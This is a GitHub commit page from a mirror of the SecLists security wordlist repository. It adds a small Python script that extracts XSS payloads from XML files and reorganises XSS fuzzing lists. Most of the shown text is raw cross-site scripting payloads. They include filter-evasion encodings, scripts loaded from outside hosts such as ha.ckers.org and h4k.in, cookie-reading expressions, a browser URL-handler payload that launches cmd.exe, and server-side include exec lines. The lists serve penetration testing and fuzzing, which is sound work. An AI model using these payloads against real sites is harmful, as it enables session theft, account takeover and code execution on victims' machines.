sync/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-04-29 02:06:29 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 2

Merge pull request #968 from molangning/patch-xss-wordlists

Browse source 
Patch xss wordlists

https://github.com/OWASP/EnDe
https://twitter.com/brutelogic/status/1749818762344427614
This commit is contained in:
g0tmi1k 2024-02-16 15:48:15 +00:00 committed by GitHub
commit debe0cd88d
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
15 changed files with 3332 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
.bin/README.md
View file

@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse-
`os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url. `os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url.
By default this script outputs the results in `Fuzzing/os-names-mutated.txt` By default this script outputs the results in `Fuzzing/os-names-mutated.txt`
- - -
`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique.

41
.bin/xml-parser.py Executable file
View file

@ -0,0 +1,41 @@
#!/usr/bin/python3
import os
import sys
import xml.etree.ElementTree as et
if len(sys.argv) == 1:
exit(0)
files=sys.argv[1].split(" ")
for i in files:
if not os.path.isfile(i):
print("[!] %s does not exist!"%(i))
exit(2)
for i in files:
xml_file = et.parse(i)
contents = []
for j in xml_file.getroot().findall("attack"):
xss = j.find('code').text
if not xss:
continue
if "\n" in xss:
print("Xss have newline in it.")
print(xss, "\n")
contents.append(xss)
file_dir, file_name = i.rsplit("/", 1)
file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt")
open(file_name, "w").write("\n".join(contents))
print(f"Wrote to {file_name}")

1
Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt
View file

@ -111,3 +111,4 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<form onsubmit=alert(1)><input type=submit> <form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2 <select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me! <menu id=x contextmenu=x onshow=alert(1)>right click me!
<Img Src=javascript:alert(1) OnError=location=src>
Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 4 KiB

After

Width:  |  Height:  |  Size: 4.1 KiB

0
Fuzzing/XSS/XSS-EnDe-evation.txt → Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt
View file

0
Fuzzing/XSS/XSS-EnDe-h4k.xml → Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml
View file

0
Fuzzing/XSS/XSS-EnDe-mario.xml → Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml
View file

0
Fuzzing/XSS/XSS-EnDe-xssAttacks.xml → Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml
View file

0
Fuzzing/XSS/XSS-payloadbox.txt → Fuzzing/XSS/human-friendly/XSS-payloadbox.txt
View file

62
Fuzzing/XSS/robot-friendly/README.md
View file

@ -11,3 +11,65 @@ Some XSS trigger condition may require you to interact with the web pages to tri
To see the results, look out for message popups or network activity in the devtools of your browser. To see the results, look out for message popups or network activity in the devtools of your browser.
Happy hacking! Happy hacking!
## Removed xss
### XSS-EnDe-h4k.txt
Removed because there was no way to squash it into one line
```
_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)
```
### XSS-EnDe-xssAttacks.txt
Also removed due to it's multiline nature
```
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
```

1
Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt
View file

@ -111,3 +111,4 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<form onsubmit=alert(1)><input type=submit> <form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2 <select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me! <menu id=x contextmenu=x onshow=alert(1)>right click me!
<Img Src=javascript:alert(1) OnError=location=src>
Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 4 KiB

After

Width:  |  Height:  |  Size: 4.1 KiB

164
Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt Normal file
View file

@ -0,0 +1,164 @@
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas&Tab;cript:alert(42)" type=image>
"'><sc ript>confirm(42)</script>
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
<div style="{ left:expression( alert('XSS') ) }">
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expr&#x65;ssion(alert('XSS'))
left:expr&#101;ssion(alert('XSS'))
left:expr&#x0065;ssion(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
left:(alert('XSS'))
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS'))
left:(alert('XSS'))
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
%u00ABscript%u00BB
&#x3008;script&#x3009;
U%2bFF1CscriptU%2bFF1E
&#x2039;script&#x203A;
&#x2329;script&#x232A;
&#x27E8;script&#x27E9;
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->

206
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.txt Normal file
View file

@ -0,0 +1,206 @@
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
<div&nbsp;style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
<BASE HREF="javascript:alert('XSS');//">
`> <script>alert(5)</script>
> <script>alert(4)</script>
xyz onerror=alert(6);
1;a=eval;b=alert;a(b(/c/.source));
1];a=eval;b=alert;a(b(17));//
];a=eval;b=alert;a(b(16));//
'];a=eval;b=alert;a(b(15));//
1};a=eval;b=alert;a(b(14));//
'};a=eval;b=alert;a(b(13));//
};a=eval;b=alert;a(b(12));//
a=1;a=eval;b=alert;a(b(11));//
;//%0da=eval;b=alert;a(b(10));//
';//%0da=eval;b=alert;a(b(9));//
'> <script>alert(3)</script>
</title><script>alert(1)</script>
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<!--<A href="- --><a href=javascript:alert:document.domain>test-->
<IMG SRC=JaVaScRiPt:alert('XSS')>
<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
*/a=eval;b=alert;a(b(/e/.source));/*
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<A HREF="http://1113982867/">XSS</A>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
\";alert('XSS');//
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
eval(name)
<A HREF="http://www.google.com./">XSS</A>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
<IMG SRC="javascript:alert('XSS')"
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
'';!--"<script>alert(0);</script>=&{(alert(1))}
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
<img src=`x` onrerror= ` ;; alert(1) ` />
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<A HREF="http://66.102.7.147/">XSS</A>
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
<BR SIZE="&{alert('XSS')}">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
%0da=eval;b=alert;a(b(/d/.source));
<a href = "javas cript :ale rt(1)">test
+alert(0)+
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC="livescript:[code]">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<A HREF="http://6&#09;6.000146.0x7.147/">XSS</A>
<IMG SRC="mocha:[code]">
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
<IMGSRC="javascript:alert('XSS')">
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
a=/ev/// .source a+=/al/// .source a[a] (name)
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
setTimeout//
(name// ,0)
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
open(name)
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
alert(1)
<A HREF="//www.google.com/">XSS</A>
<SCRIPT SRC=//ha.ckers.org/.j>
0%0d%0a%00<script src=//h4k.in>
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<A HREF="http://google.com/">XSS</A>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
eval.call(this,unescape.call(this,location))
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
_=eval,__=unescape,___=document.URL,_(__(___))
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
with(location)with(hash)eval(substring(1))
<IMG SRC=" &#14; javascript:alert('XSS');">
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
